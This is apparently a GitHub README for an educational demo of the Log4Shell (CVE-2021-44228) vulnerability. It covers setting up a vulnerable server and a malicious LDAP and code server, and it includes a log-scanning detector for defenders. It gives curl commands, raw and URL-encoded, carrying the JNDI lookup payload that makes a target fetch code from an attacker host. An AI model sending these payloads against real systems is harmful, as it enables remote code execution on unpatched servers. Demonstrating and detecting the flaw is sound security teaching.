Description
Demo to show how Log4Shell / CVE-2021-44228 vulnerability works
Introduction
# Log4Shell in action
This project aims to demonstrate how the Log4Shell / CVE-2021-44228 vulnerability works.
## Requirements
You only need to have Docker installed. Ideally you have two different virtual machines: one for the _vulnerable server_ and one for the _malicious server_, which will host the malicious codebase and an LDAP server.
Optionally you can have _Make_ and _Docker Compose_ installed, but this is **not** necessary, since this repo also contains a `make.sh` that skips these requirements and runs them from within a Docker container.
## Install Docker (optionally)
If you haven't installed Docker already, you can follow these steps for a Debian VM: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46
## Download the repository
```
git clone git@github.com:mschmnet/Log4Shell-demo.git
```
## Install vulnerable server
```
cd vulnerable-server
../make.sh run # Or execute `make run` if you have Make and Docker Compose installed
```
## Start malicious server
This will start a basic LDAP server and a basic Python server to serve the malicious Java classes.
You need to provide the IP address or domain name where these servers will be available:
```
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally use make instead of ../make.sh if you have Make and Docker Compose installed
```
## How to attack the target server
```
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint
```
or just
```
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'
```
In the second command, `${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}` is simply URL-encoded.
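For the defending side, the sketch below is an added example (not part of this repository) that scans web access log lines for the lookup string used in the requests above, percent-decoding each URI first so the raw and URL-encoded forms are both caught. The log format, sample lines, addresses and the `malicious.example` host are constructed assumptions, and it matches only the literal `${jndi:` prefix shown on this page.

```python
import re
from urllib.parse import unquote

# Lookup prefix from the README's request; captures the scheme and host:port.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)
# Client address and request URI of a common-log-format line.
LOG_LINE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_lookups(log_lines):
    """Return (line_no, client, scheme, callback_host) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        parsed = LOG_LINE.match(line)
        if not parsed:
            continue  # not a request line we understand
        client, uri = parsed.groups()
        match = JNDI_LOOKUP.search(fully_decode(uri))
        if match:
            hits.append((line_no, client, match.group(1).lower(), match.group(2)))
    return hits


# Constructed sample lines (documentation addresses, placeholder host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2021:10:00:01 +0000] "GET /some-endpoint?foo=bar HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Dec/2021:10:00:05 +0000] "GET /some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.example%3A1389%2Fa%7D HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Dec/2021:10:00:09 +0000] "GET /some-endpoint?foo=${jndi:ldap://malicious.example:1389/a} HTTP/1.1" 200 12',
    # Same request after being percent-encoded a second time, e.g. by a proxy.
    '203.0.113.4 - - [12/Dec/2021:10:00:12 +0000] "GET /some-endpoint?foo=%2524%257Bjndi%253Aldap%253A%252F%252Fmalicious.example%253A1389%252Fa%257D HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print("line %d: %s requested a JNDI %s lookup to %s" % hit)
```

A hit means the string reached the server, not that the lookup ran; outbound connections from the application host to the captured `host:port` are the follow-up check.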
## How to stop any of them
```
../make.sh stop
```
## How to show the logs
```
../make.sh logs
```
## Slides
https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf
File snapshot
```
[4.0K] /data/pocs/90d4d9419ecd735cd6973fbc8521d19c2c3434ef
├── [4.0K] html
│   ├── [4.0K] img
│   │   ├── [ 60K] apache-versions.png
│   │   └── [168K] Log4Shell_logo.png
│   └── [ 55K] slides.htm
├── [4.0K] img
│   ├── [ 60K] apache-versions.png
│   └── [168K] Log4Shell_logo.png
├── [1012] Makefile
├── [ 160] make.sh
├── [4.0K] malicious-server
│   ├── [4.0K] codebase
│   │   ├── [ 242] Dockerfile
│   │   ├── [ 623] pom.xml
│   │   └── [4.0K] src
│   │       └── [4.0K] main
│   │           └── [4.0K] java
│   │               └── [1.1K] Exploit.java
│   ├── [ 298] docker-compose.yml
│   ├── [ 236] Makefile
│   └── [4.0K] marshalsec
│       └── [ 522] Dockerfile
├── [4.0K] pdf
│   └── [375K] slides.pdf
├── [2.0K] README.md
├── [2.8K] slides.md
└── [4.0K] vulnerable-server
    ├── [ 137] docker-compose.yml
    ├── [ 219] Dockerfile
    ├── [ 181] Makefile
    ├── [9.8K] mvnw
    ├── [6.5K] mvnw.cmd
    ├── [2.0K] pom.xml
    └── [4.0K] src
        ├── [4.0K] main
        │   ├── [4.0K] java
        │   │   └── [4.0K] net
        │   │       └── [4.0K] mschm
        │   │           └── [4.0K] log4shell
        │   │               └── [4.0K] vulnerableserver
        │   │                   ├── [ 557] Controller.java
        │   │                   └── [ 355] VulnerableWebServerApplication.java
        │   └── [4.0K] resources
        │       ├── [   1] application.properties
        │       ├── [ 466] log4j2.xml
        │       └── [4.0K] static
        │           └── [  90] index.html
        └── [4.0K] test
            └── [4.0K] java
                └── [4.0K] net
                    └── [4.0K] mschm
                        └── [4.0K] log4shell
                            └── [4.0K] vulnerableserver
                                └── [ 241] VulnerableWebServerApplicationTests.java

26 directories, 28 files
```